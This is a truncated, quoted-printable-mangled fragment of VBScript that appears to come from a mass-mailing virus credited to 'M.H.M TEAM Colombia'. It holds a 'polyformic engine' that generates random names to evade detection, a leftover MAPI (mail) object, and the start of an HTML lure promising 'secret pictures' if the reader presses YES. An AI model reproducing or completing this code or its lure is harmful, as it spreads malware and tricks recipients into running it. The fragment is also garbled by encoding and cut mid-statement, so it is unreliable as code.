out=3DNothing Set mapi=3DNothing end sub Function polyname(n) Dim i, vector, texto, pos on error resume next rem polyformic ( ohhhh yeahhh...) very good polyformic engine :() by = Sand Ja9e Gr0w vector =3D Array("A", "E", "I", "O", "U") texto =3D "" Randomize For i =3D 1 To n Randomize rem consonante texto =3D texto&Chr(Int((Rnd * 25) + 65)) i =3D i + 1 If i > n Then exit for end if rem vocal texto =3D texto&vector(Int((Rnd * 4) + 1)) Randomize Next polyname =3D texto End Function sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1=3D""&_ ""&vbcrlf& _ "

M.H.M TEAM

Colombia
- Please press #-#YES#-# = button for see secret pictures"&vbcrlf& _ "Hello = Colombia...! Since Here, after, since other part of World.. = "&vbcrlf& _ ""&vbcrlf& _ "